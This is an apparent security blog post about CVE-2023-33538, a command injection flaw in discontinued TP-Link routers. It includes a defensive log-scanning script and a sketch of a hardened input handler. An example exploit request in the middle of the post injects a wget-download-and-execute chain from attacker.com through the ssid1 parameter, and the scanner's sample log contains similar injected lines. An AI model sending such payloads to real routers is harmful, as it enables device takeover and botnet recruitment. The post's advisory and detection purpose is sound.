Om Shree
CVE-2023-33538: The TP-Link Command Injection Flaw That's Still Being Actively Exploited

A vulnerability disclosed in 2023 is back in the news — because attackers are actively using it right now.

CVE-2023-33538 is a command injection bug with a CVSS score of 8.8 (The Hacker News) in several TP-Link home router models. CISA added it to its Known Exploited Vulnerabilities catalog in June 2025 (CVE Details), and Unit 42 researchers confirmed active exploitation attempts shortly after. The situation is messier than most CVE alerts because the affected products are end-of-life, meaning no vendor patches are available (CVE Details). The fix is to throw the router away.

What's Vulnerable

Three discontinued TP-Link router models are affected: TL-WR940N V2/V4, TL-WR841N V8/V10, and TL-WR740N V1/V2 (CinchOps, Inc.). These are mass-market home routers. Millions were sold. A lot of them are still plugged in.

How the Vulnerability Works

The /userRpm/WlanNetworkRpm endpoint contains a vulnerability in processing the ssid1 parameter sent through an HTTP GET request. The parameter value is not sanitized when the router processes it, so an attacker can send commands directly through it — allowing remote code execution on the device (Palo Alto Networks).

The attack surface is the router's web management interface. The flaw requires no authentication to exploit in some configurations, meaning attackers can compromise vulnerable routers without needing login credentials or physical access (CinchOps, Inc.). That said, Unit 42's deeper analysis found a wrinkle: successful exploitation actually requires authentication to the router's web interface (Palo Alto Networks) — which in practice isn't much of a barrier, since most of these devices still run default credentials.

A typical exploit request looks like this:

```http
GET /userRpm/WlanNetworkRpm.htm?ssid1=HomeNetwork;wget+http://attacker.com/payload+-O+/tmp/x;chmod+777+/tmp/x;/tmp/x HTTP/1.1
Host: 192.168.1.1
```

The ssid1 parameter accepts the injected commands. The router executes them without validation.

What Attackers Are Actually Doing

The observed payloads are malicious binaries characteristic of Mirai-like botnet malware, which the exploits attempt to download and execute on vulnerable devices (Palo Alto Networks). The pattern is straightforward: find the router, authenticate with default credentials, inject a wget command to pull down a binary, make it executable, run it.

Unit 42's analysis uncovered something interesting though. The exploit attempts contain errors. While the endpoint /userRpm/WlanNetworkRpm.htm is correct, the exploits are incorrectly attempting to inject malicious commands into the ssid parameter. The actual vulnerable parameter on the target system is ssid1 (Palo Alto Networks).

So the attacks in the wild are technically flawed. They'd fail on a properly configured device. But that doesn't mean the underlying vulnerability isn't real — it is. It just means the botnet operators got the parameter name wrong, and the vulnerability is still wide open for anyone who looks at the original disclosure more carefully.

The Botnet Connection

In December 2024, Palo Alto Networks Unit 42 identified samples of an OT-centric malware called FrostyGoop. One of the IP addresses associated with an ENCO control device was also linked to a TP-Link WR740N router used to facilitate web browser access to the ENCO device (SecPod Blog). Direct evidence tying CVE-2023-33538 to that specific attack doesn't exist, but the association illustrates the real-world risk: compromised home routers becoming pivot points into operational technology networks, including industrial systems.

Compromised routers can also be recruited into botnets to launch DDoS attacks, used to steal data transmitted through the network, or serve as a gateway to deploy malware on connected devices (SecPod Blog).

Why This Is Still a Problem in 2025

The vulnerability was first disclosed in June 2023. TP-Link discontinued these router models in 2017. The combination of old hardware, no patch, and default credentials still in place on deployed devices is exactly the kind of long tail that keeps security researchers employed.

TP-Link told The Hacker News that it has provided fixes through its tech support platform since 2018, and encouraged customers to contact support for patched firmware or to upgrade their devices (The Hacker News). The practical reality: most people who bought a TP-Link router eight years ago are not checking in with TP-Link support for firmware updates. The router is just sitting there, doing its job, running software from a decade ago.

The EPSS score for this vulnerability sits at 90.63% probability of exploitation activity in the next 30 days (CVE Details) — that puts it in roughly the top percentile of all tracked CVEs for active exploitation risk.

What To Do

If you own or manage any of the affected models (TL-WR940N V2/V4, TL-WR841N V8/V10, TL-WR740N V1/V2), the recommendation is unambiguous: replace the device. There is no patch coming.

If replacement isn't immediate:

  • Disable remote management (usually under "Remote Management" or "Web Management" in router settings)
  • Change default admin credentials to something non-trivial
  • Segment the router from critical devices on your network
  • Monitor for unusual outbound traffic

For organizations doing network audits, these models will surface in legacy environments, branch offices, and home office setups for employees on VPN. They're worth explicitly checking for.
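For the "monitor" item above, here is an added example (not from the post, TP-Link or Unit 42) of a small scan a defender can run over web-access logs: it flags requests that reach the vulnerable endpoint with shell metacharacters in ssid1, and also the mistyped ssid parameter Unit 42 saw in the wild, which still signals a hostile source even though the attempt fails. The log format and all addresses are constructed for the example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Values from the CVE-2023-33538 write-ups: the vulnerable endpoint, the real
# parameter (ssid1) and the mistyped one (ssid) seen in in-the-wild attempts.
VULN_PATH = "/userRpm/WlanNetworkRpm.htm"
WATCHED_PARAMS = ("ssid1", "ssid")
SHELL_META = re.compile(r"[;|&`$()<>\n]")  # shell metacharacters never valid in an SSID

# Constructed sample log lines; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Jul/2025:10:00:01 +0000] "GET /userRpm/WlanNetworkRpm.htm?ssid1=HomeNetwork&region=0 HTTP/1.1" 200 512
203.0.113.11 - - [01/Jul/2025:10:00:02 +0000] "GET /userRpm/WlanNetworkRpm.htm?ssid1=x;wget+http://198.51.100.5/a+-O+/tmp/x;/tmp/x HTTP/1.1" 200 512
203.0.113.12 - - [01/Jul/2025:10:00:03 +0000] "GET /userRpm/WlanNetworkRpm.htm?ssid=x%3Bwget%20http%3A%2F%2F198.51.100.5%2Fa HTTP/1.1" 200 512
203.0.113.13 - - [01/Jul/2025:10:00:04 +0000] "GET /userRpm/StatusRpm.htm HTTP/1.1" 200 4096
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')

def parse_query(query):
    """Split on '&' only and percent-decode, so a ';' inside a value survives on every Python version."""
    params = {}
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params

def classify_request(target):
    """Return a finding for one request target, or None if it looks benign."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    for name in WATCHED_PARAMS:
        for value in parse_query(parts.query).get(name, []):
            if SHELL_META.search(value):
                note = "targets the real parameter" if name == "ssid1" else "mistyped parameter; attempt likely fails, source still hostile"
                return {"param": name, "value": value, "note": note}
    return None

def scan_log(text):
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        finding = classify_request(m.group("target"))
        if finding:
            finding.update(ip=m.group("ip"), ts=m.group("ts"))
            findings.append(finding)
    return findings
```

Run against the sample, it reports the two hostile requests with their source IPs and leaves the legitimate SSID change alone; the same function works on a router reverse proxy log or a firewall's HTTP inspection log if the request target is extracted the same way.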

The Broader Pattern

CVE-2023-33538 is not an exotic vulnerability. It's a missing input sanitization check on a parameter that processes user input. The fix at the code level would have been a few lines. The real problem is that the devices were EOL before the vulnerability was even publicly documented, which means there's no vendor support left to deploy a fix.
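What "a few lines" looks like, as an added example that is not the firmware's code (TP-Link's source is not public, so the handler and the iwconfig call are hypothetical): the vulnerable shape splices the raw ssid1 value into a shell string, while the hardened shape allowlists the value against the 802.11 SSID rules and hands it to the program as a single argv element with no shell involved.

```python
import re

# Hypothetical handler for the ssid1 value of /userRpm/WlanNetworkRpm.
# 802.11 SSIDs are at most 32 bytes; this allowlist also excludes every
# shell metacharacter, so nothing that passes it can be parsed as a command.
SSID_ALLOWED = re.compile(r"[A-Za-z0-9 _.\-]{1,32}")

def unsafe_command(ssid1):
    """Vulnerable shape: the raw request value is spliced into a shell string.
    A value like 'Home;wget ...' becomes extra commands when that string runs."""
    return f"iwconfig wlan0 essid {ssid1}"

def is_valid_ssid(ssid1):
    """Allowlist check applied before the value reaches any system call."""
    return isinstance(ssid1, str) and SSID_ALLOWED.fullmatch(ssid1) is not None

def safe_argv(ssid1):
    """Hardened shape: the validated value is one argv element passed to the
    program directly (subprocess.run(argv), shell=False), so no shell parses it."""
    if not is_valid_ssid(ssid1):
        raise ValueError("ssid1 rejected: disallowed characters or length")
    return ["iwconfig", "wlan0", "essid", ssid1]
```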

This pattern keeps repeating. Old IoT hardware, no update mechanism, default credentials, perpetually connected. The Mirai botnet first appeared in 2016 exploiting default credentials on IoT devices. Eight years later, the same playbook still works on millions of deployed devices.

The vulnerability isn't the interesting part. The infrastructure that keeps these devices running for a decade after the vendor stopped caring is.

